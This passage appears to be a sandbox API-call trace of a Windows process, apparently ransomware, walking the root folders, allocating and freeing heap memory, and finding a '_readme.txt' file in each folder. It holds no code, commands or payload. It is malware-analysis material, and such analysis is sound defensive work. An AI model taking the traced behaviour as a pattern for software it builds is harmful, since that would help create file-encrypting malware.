cAlternateFileName="PROGRA~2")) returned 1 [0174.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0174.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0174.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfc) returned 0x2c70bc8 [0174.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0174.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0174.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0174.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0174.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27810 | out: hHeap=0x6a0000) returned 1 [0174.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27770 | out: hHeap=0x6a0000) returned 1 [0174.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c18 | out: hHeap=0x6a0000) returned 1 [0174.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0174.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c18 [0174.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0174.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0174.087] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1f2b3de0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x1f2b3de0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0174.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27770 [0174.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27810 [0174.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27810 | out: hHeap=0x6a0000) returned 1 [0174.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27770 | out: hHeap=0x6a0000) returned 1 [0174.088] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7844bbf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x78471d50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x78471d50, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0174.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27770 [0174.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27810 [0174.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27838 [0174.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27810 | out: hHeap=0x6a0000) returned 1 [0174.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27770 | out: hHeap=0x6a0000) returned 1 [0174.088] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xa3740380, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xbd8bb9c0, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbd8bb9c0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0174.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0174.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0174.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x16c) returned 0x2c40050 [0174.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0174.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27770 [0174.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0174.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27810 [0174.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27860 [0174.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0174.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0174.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27888 [0174.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0174.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0174.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c18 | out: hHeap=0x6a0000) returned 1 [0174.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27838 | out: hHeap=0x6a0000) returned 1 [0174.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0174.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0174.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0174.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0174.092] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1fe61c0, ftCreationTime.dwHighDateTime=0x1d8a8ba, ftLastAccessTime.dwLowDateTime=0xa1fe61c0, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xa1fe61c0, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0174.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27838 [0174.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27838 | out: hHeap=0x6a0000) returned 1 [0174.093] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0174.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27838 [0174.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27838 | out: hHeap=0x6a0000) returned 1 [0174.094] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa17fc670, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0xa17fc670, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0174.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27838 [0174.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27838 | out: hHeap=0x6a0000) returned 1 [0174.094] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0xe071b790, ftCreationTime.dwHighDateTime=0x1d8a8ba, ftLastAccessTime.dwLowDateTime=0xe071b790, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xe071b790, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0174.094] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0xe071b790, ftCreationTime.dwHighDateTime=0x1d8a8ba, ftLastAccessTime.dwLowDateTime=0xe071b790, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xe071b790, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0174.094] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c18 [0174.095] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c18 | out: hHeap=0x6a0000) returned 1 [0174.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27838 [0174.110] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.120] RtlAllocateHeap 